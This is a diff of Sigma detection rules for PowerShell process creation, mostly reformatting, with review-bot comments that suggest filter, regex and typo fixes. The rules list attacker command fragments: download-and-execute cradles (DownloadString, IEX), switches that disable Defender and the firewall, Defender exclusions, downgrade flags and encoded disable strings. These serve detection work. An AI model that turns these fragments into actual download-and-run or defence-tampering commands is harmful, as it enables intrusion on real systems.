b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml 
@@ -1,8 +1,7 @@ title: Potential PowerShell Obfuscation Via Reversed Commands id: b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 status: test -description: Detects the presence of reversed PowerShell commands in the CommandLine. - This is often used as a method of obfuscation by attackers +description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers references: - https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/ - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66 @@ -22,18 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - hctac - kaerb - dnammoc - - ekovn + - ekovn # Also covers 'ekovni' - eliFd - rahc - etirw @@ -56,7 +55,10 @@ detection: - hcaerof - retupmoc filter_main_encoded_keyword: - CommandLine|contains: + # We exclude usage of encoded commands as they might generate FPs as shown here: + # https://github.com/SigmaHQ/sigma/pull/2720 + # https://github.com/SigmaHQ/sigma/issues/4270 + CommandLine|contains: - ' -EncodedCommand ' - ' -enc ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml index 366346c44..fe062f91a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml 
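Review bot: `filter_main_encoded_keyword` excludes only ` -EncodedCommand ` and ` -enc `, but PowerShell accepts any unambiguous prefix (` -e `, ` -ec `, ` -en `, ` -enco `), and a sibling rule in this patch even notes `' -e' # covers -en and -enc`; an encoded command launched with ` -e ` keeps producing the base64 false positives the two linked issues describe. Consider `CommandLine|contains: [' -e ', ' -ec ', ' -en', ' -EncodedCommand ']` so the abbreviation forms are covered, keeping in mind that a bare `' -e'` would also swallow `-ExecutionPolicy` lines. The PR/issue links added in the comments are valuable; keep them.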
@@ -4,8 +4,7 @@ status: test
description: Detects the PowerShell command lines with special characters
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64
-author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
- (fp)
+author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
date: 2020/10/15
modified: 2023/04/06
tags:
@@ -21,24 +20,24 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
selection_re:
- - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*
- - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*
- - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.*
- - CommandLine|re: .*`.*`.*`.*`.*`.*
+ # TODO: Optimize for PySIGMA
+ - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*
+ - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*
+ - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.*
+ - CommandLine|re: .*`.*`.*`.*`.*`.*
filter_optional_amazonSSM:
ParentProcessName: C:\Program Files\Amazon\SSM\ssm-document-worker.exe
filter_optional_defender_atp:
- CommandLine|contains:
+ CommandLine|contains:
- new EventSource("Microsoft.Windows.Sense.Client.Management"
- - public static extern bool InstallELAMCertificateInfo(SafeFileHandle
- handle);
+ - public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);
condition: process_creation and (all of selection_* and not 1 of filter_optional_*)
falsepositives:
- Amazon SSM Document Worker
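Review bot: The `CommandLine|re` patterns under `selection_re` wrap every token in `.*`, which is redundant for an unanchored search and makes the matcher backtrack heavily on long command lines; this is presumably what the newly added `# TODO: Optimize for PySIGMA` refers to, but the TODO does not say so. A counted repetition expresses the same "at least N occurrences" threshold without the nested wildcards, e.g. `- CommandLine|re: (?:.*\^){5}` for the caret pattern, with the same form and the matching count for the `\+`, `\{` and backtick patterns. If the TODO stays, consider spelling out what needs optimizing so the next editor does not have to rediscover it.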
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml
index a408e969c..952fe8e4f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml
@@ -1,11 +1,10 @@
title: Computer Discovery And Export Via Get-ADComputer Cmdlet
id: 435e10e4-992a-4281-96f3-38b11106adde
related:
- - id: db885529-903f-4c5d-9864-28fe199e6370
- type: similar
+ - id: db885529-903f-4c5d-9864-28fe199e6370
+ type: similar
status: test
-description: Detects usage of the Get-ADComputer cmdlet to collect computer information
- and output it to a file
+description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
references:
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
- https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
@@ -24,17 +23,17 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- 'Get-ADComputer '
- ' -Filter \*'
- CommandLine|contains:
+ CommandLine|contains:
- ' > '
- ' | Select '
- Out-File
@@ -42,7 +41,6 @@ detection:
- Add-Content
condition: process_creation and (all of selection_*)
falsepositives:
- - Legitimate admin scripts may use the same technique, it's better to exclude
- specific computers or users who execute these commands or scripts often
+ - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
level: medium
ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml
index 2fe2294c8..a4e0bdc9a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml
@@ -1,8 +1,8 @@
title: New Service Creation Using PowerShell
id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2
related:
- - id: 85ff530b-261d-48c6-a441-facaa2e81e48
- type: similar
+ - id: 85ff530b-261d-48c6-a441-facaa2e81e48 # Using Sc.EXE
+ type: similar
status: test
description: Detects the creation of a new service using powershell.
references:
@@ -21,7 +21,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- New-Service
- -BinaryPathName
condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml
index 30594054d..95c7c6d8a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml
@@ -17,13 +17,11 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- GZipStream
- ::Decompress
condition: process_creation and selection
falsepositives:
- - Legitimate administrative scripts may use this functionality. Use "ParentImage"
- in combination with the script names and allowed users and applications to
- filter legitimate executions
+ - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions
level: medium
ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml
index 7530ca39c..f693b6da5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml
@@ -1,8 +1,7 @@
title: PowerShell Execution With Potential Decryption Capabilities
id: 434c08ba-8406-4d15-8b24-782cb071a691
status: experimental
-description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the
- next stage of the malware.
+description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
references:
- https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
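Review bot: The re-flowed description line of proc_creation_win_powershell_decrypt_pattern.yml carries a stray double quote over from the old text, `".LNK" "file to drop the next stage`, which reads as an unterminated quoted word. Since the line is already being rewritten, this is the place to drop it: `description: Detects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware.`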
@@ -21,33 +20,33 @@ detection:
OriginalFileName:
- PowerShell.EXE
- pwsh.dll
- NewProcessName|endswith:
+ NewProcessName|endswith:
- \powershell.exe
- \pwsh.exe
selection_cli_dir:
- CommandLine|contains:
+ CommandLine|contains:
- 'Get-ChildItem '
- 'dir '
- 'gci '
- 'ls '
selection_cli_gc:
- CommandLine|contains:
+ CommandLine|contains:
- 'Get-Content '
- 'gc '
- 'cat '
- 'type '
- ReadAllBytes
selection_cli_specific:
- - CommandLine|contains|all:
- - ' ^| '
- - \*.lnk
- - -Recurse
- - '-Skip '
- - CommandLine|contains|all:
- - ' -ExpandProperty '
- - \*.lnk
- - WriteAllBytes
- - ' .length '
+ - CommandLine|contains|all:
+ - ' ^| '
+ - \*.lnk
+ - -Recurse
+ - '-Skip '
+ - CommandLine|contains|all:
+ - ' -ExpandProperty '
+ - \*.lnk
+ - WriteAllBytes
+ - ' .length '
condition: process_creation and (all of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
index 89ffcf893..4f2fd0bb9 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
@@ -1,8 +1,7 @@
title: Powershell Defender Disable Scan Feature
id: 1ec65a5f-9473-4f12-97da-622044d6df21
status: test
-description: Detects requests to disable Microsoft Defender features using PowerShell
- commands
+description: Detects requests to disable Microsoft Defender features using PowerShell commands
references:
- https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
- https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE
@@ -21,11 +20,11 @@ detection:
EventID: 4688
Channel: Security
selection_cli_cmdlet:
- CommandLine|contains:
+ CommandLine|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
selection_cli_option:
- CommandLine|contains:
+ CommandLine|contains:
- 'DisableArchiveScanning '
- 'DisableRealtimeMonitoring '
- 'DisableIOAVProtection '
@@ -34,11 +33,12 @@ detection:
- 'DisableCatchupFullScan '
- 'DisableCatchupQuickScan '
selection_cli_value:
- CommandLine|contains:
+ CommandLine|contains:
- $true
- ' 1 '
selection_encoded_modifier:
- CommandLine|base64offset|contains:
+ CommandLine|base64offset|contains:
+ # Note: Since this is calculating offsets casing is important
- 'disablearchivescanning '
- 'DisableArchiveScanning '
- 'disablebehaviormonitoring '
@@ -54,7 +54,7 @@ detection:
- 'disablerealtimemonitoring '
- 'DisableRealtimeMonitoring '
selection_encoded_direct:
- CommandLine|contains:
+ CommandLine|contains:
- RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA
- QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA
- EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml
index d04f54993..d34c40b1a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml
@@ -1,11 +1,10 @@
title: Powershell Defender Exclusion
id: 17769c90-230e-488b-a463-e05c08e9d48f
related:
- - id: c1344fa2-323b-4d2e-9176-84b4d4821c88
- type: similar
+ - id: c1344fa2-323b-4d2e-9176-84b4d4821c88
+ type: similar
status: test
-description: Detects requests to exclude files, folders or processes from Antivirus
- scanning using PowerShell cmdlets
+description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
references:
- https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
@@ -24,11 +23,11 @@ detection:
EventID: 4688
Channel: Security
selection1:
- CommandLine|contains:
+ CommandLine|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
selection2:
- CommandLine|contains:
+ CommandLine|contains:
- ' -ExclusionPath '
- ' -ExclusionExtension '
- ' -ExclusionProcess '
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml
index e2e91d8bf..abd572b97 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml
@@ -20,37 +20,34 @@ detection:
EventID: 4688
Channel: Security
selection_pwsh_binary:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
selection_pwsh_cli:
- CommandLine|contains:
+ CommandLine|contains:
- -DisableBehaviorMonitoring $true
- -DisableRuntimeMonitoring $true
selection_sc_binary:
- - NewProcessName|endswith: \sc.exe
- - OriginalFileName: sc.exe
+ - NewProcessName|endswith: \sc.exe
+ - OriginalFileName: sc.exe
selection_sc_tamper_cmd_stop:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- stop
- WinDefend
selection_sc_tamper_cmd_delete:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- delete
- WinDefend
selection_sc_tamper_cmd_disabled:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- config
- WinDefend
- start=disabled
- condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary
- and 1 of selection_sc_tamper_*))
+ condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary and 1 of selection_sc_tamper_*))
falsepositives:
- - Minimal, for some older versions of dev tools, such as pycharm, developers were
- known to sometimes disable Windows Defender to improve performance, but this
- generally is not considered a good security practice.
+ - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.
level: high
ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml
index d8a15ef66..72c3b2f48 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml
@@ -1,8 +1,8 @@
title: Windows Firewall Disabled via PowerShell
id: 12f6b752-042d-483e-bf9c-915a6d06ad75
related:
- - id: 488b44e7-3781-4a71-888d-c95abfacf44d
- type: similar
+ - id: 488b44e7-3781-4a71-888d-c95abfacf44d
+ type: similar
status: test
description: Detects attempts to disable the Windows Firewall using PowerShell
references:
@@ -21,20 +21,20 @@ detection:
EventID: 4688
Channel: Security
selection_name:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - \powershell_ise.exe
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - \powershell_ise.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
selection_args:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- 'Set-NetFirewallProfile '
- ' -Enabled '
- ' False'
selection_opt:
- CommandLine|contains:
+ CommandLine|contains:
- ' -All '
- Public
- Domain
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml
index 9d2b8d9df..904cd989f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml
@@ -1,8 +1,7 @@
title: Disabled IE Security Features
id: fb50eb7a-5ab1-43ae-bcc9-091818cb8424
status: test
-description: Detects command lines that indicate unwanted modifications to registry
- keys that disable important Internet Explorer security features
+description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
references:
- https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
author: Florian Roth (Nextron Systems)
@@ -19,15 +18,15 @@ detection:
EventID: 4688
Channel: Security
selection1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' -name IEHarden '
- ' -value 0 '
selection2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' -name DEPOff '
- ' -value 1 '
selection3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' -name DisableFirstRunCustomize '
- ' -value 2 '
condition: process_creation and (1 of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml
index 310427b6f..5c7535848 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml
@@ -1,8 +1,7 @@
title: Potential PowerShell Execution Via DLL
id: 6812a10b-60ea-420c-832f-dfcc33b646ba
status: test
-description: Detects potential PowerShell execution from a DLL instead of the usual
- PowerShell process as seen used in PowerShdll
+description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll
references:
- https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md
author: Markus Neis, Nasreddine Bencherchali
@@ -19,18 +18,18 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith:
- - \rundll32.exe
- - \regsvcs.exe
- - \InstallUtil.exe
- - \regasm.exe
- - OriginalFileName:
- - RUNDLL32.EXE
- - RegSvcs.exe
- - InstallUtil.exe
- - RegAsm.exe
+ - NewProcessName|endswith:
+ - \rundll32.exe
+ - \regsvcs.exe
+ - \InstallUtil.exe
+ - \regasm.exe
+ - OriginalFileName:
+ - RUNDLL32.EXE
+ - RegSvcs.exe
+ - InstallUtil.exe
+ - RegAsm.exe
selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
- Default.GetString
- FromBase64String
- Invoke-Expression
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml
index ff1d6854f..d977fe8a7 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml
@@ -1,11 +1,10 @@
title: Potential PowerShell Downgrade Attack
id: b3512211-c67e-4707-bedc-66efc7848863
related:
- - id: 6331d09b-4785-4c13-980f-f96661356249
- type: derived
+ - id: 6331d09b-4785-4c13-980f-f96661356249
+ type: derived
status: test
-description: Detects PowerShell downgrade attack by comparing the host versions with
- the actually used engine version 2.0
+description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
references:
- http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
- https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-
@@ -24,7 +23,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- ' -version 2 '
- ' -versio 2 '
- ' -versi 2 '
@@ -32,7 +31,7 @@ detection:
- ' -ver 2 '
- ' -ve 2 '
- ' -v 2 '
- NewProcessName|endswith: \powershell.exe
+ NewProcessName|endswith: \powershell.exe
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml
index 681733778..eeff6bc3a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml
@@ -1,11 +1,10 @@
title: Potential COM Objects Download Cradles Usage - Process Creation
id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf
related:
- - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe
- type: similar
+ - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe
+ type: similar
status: test
-description: Detects usage of COM objects that can be abused to download files in
- PowerShell by CLSID
+description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
references:
- https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57
@@ -22,9 +21,9 @@ detection:
EventID: 4688
Channel: Security
selection_1:
- CommandLine|contains: '[Type]::GetTypeFromCLSID('
+ CommandLine|contains: '[Type]::GetTypeFromCLSID('
selection_2:
- CommandLine|contains:
+ CommandLine|contains:
- 0002DF01-0000-0000-C000-000000000046
- F6D90F16-9C73-11D3-B32E-00C04F990BB4
- F5078F35-C551-11D3-89B9-0000F81FE221
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml
index 71007a9f4..312ad2e0b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml
@@ -20,7 +20,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- .DownloadString(
- .DownloadFile(
- 'Invoke-WebRequest '
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml
index 1572532f0..76888dadc 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml
@@ -1,8 +1,7 @@
title: Potential DLL File Download Via PowerShell Invoke-WebRequest
id: 0f0450f3-8b47-441e-a31b-15a91dc243e2
status: experimental
-description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest
- cmdlet
+description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
references:
- https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
author: Florian Roth (Nextron Systems), Hieu Tran
@@ -20,10 +19,10 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- 'Invoke-WebRequest '
- 'IWR '
- CommandLine|contains|all:
+ CommandLine|contains|all:
- http
- OutFile
- .dll
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml
index c71c9bbd4..2ee12b843 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml
@@ -19,13 +19,13 @@ detection:
EventID: 4688
Channel: Security
selection_download:
- CommandLine|contains:
+ CommandLine|contains:
- .DownloadString(
- .DownloadFile(
- 'Invoke-WebRequest '
- 'iwr '
selection_iex:
- CommandLine|contains:
+ CommandLine|contains:
- ;iex $
- '| IEX'
- '|IEX '
@@ -38,7 +38,6 @@ detection:
- Invoke-Expression
condition: process_creation and (all of selection_*)
falsepositives:
- - Some PowerShell installers were seen using similar combinations. Apply filters
- accordingly
+ - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
level: high
ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml
index 1e3064053..6ef96f9d5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml
@@ -1,11 +1,10 @@
title: PowerShell Download Pattern
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
related:
- - id: e6c54d94-498c-4562-a37c-b469d8e9a275
- type: derived
+ - id: e6c54d94-498c-4562-a37c-b469d8e9a275
+ type: derived
status: test
-description: Detects a Powershell process that contains download commands in its command
- line string
+description: Detects a Powershell process that contains download commands in its command line string
author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
date: 2019/01/16
modified: 2023/01/26
@@ -20,18 +19,18 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- new-object
- net.webclient).
- download
- CommandLine|contains:
+ CommandLine|contains:
- string(
- file(
condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml
index 48b82e132..bee76d0c0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml
@@ -17,14 +17,14 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- Add-PSSnapin
- Get-Recipient
- -ExpandProperty
- EmailAddresses
- SmtpAddress
- -hidetableheaders
- NewProcessName|endswith:
+ NewProcessName|endswith:
- \powershell.exe
- \pwsh.exe
condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml
index 3686d91f5..2e3549926 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml
@@ -1,16 +1,12 @@
title: Potential Suspicious Windows Feature Enabled - ProcCreation
id: c740d4cf-a1e9-41de-bb16-8a46a4f57918
related:
- - id: 55c925c1-7195-426b-a136-a9396800e29b
- type: similar
+ - id: 55c925c1-7195-426b-a136-a9396800e29b
+ type: similar
status: test
-description: 'Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature"
- used as a Deployment Image Servicing and Management tool.
-
- Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure,
- and update features and packages in Windows images
-
- '
+description: |
+ Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
+ Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
references:
- https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
- https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system
@@ -27,12 +23,13 @@ detection:
EventID: 4688
Channel: Security
selection_cmd:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- Enable-WindowsOptionalFeature
- -Online
- -FeatureName
selection_feature:
- CommandLine|contains:
+ # Add any insecure/unusual windows features that you don't use in your environment
+ CommandLine|contains:
- TelnetServer
- Internet-Explorer-Optional-amd64
- TFTP
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml
index 0e2fc9741..2393af046 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml
@@ -20,17 +20,17 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- ' -e '
- ' -en '
- ' -enc '
- ' -enco'
- ' -ec '
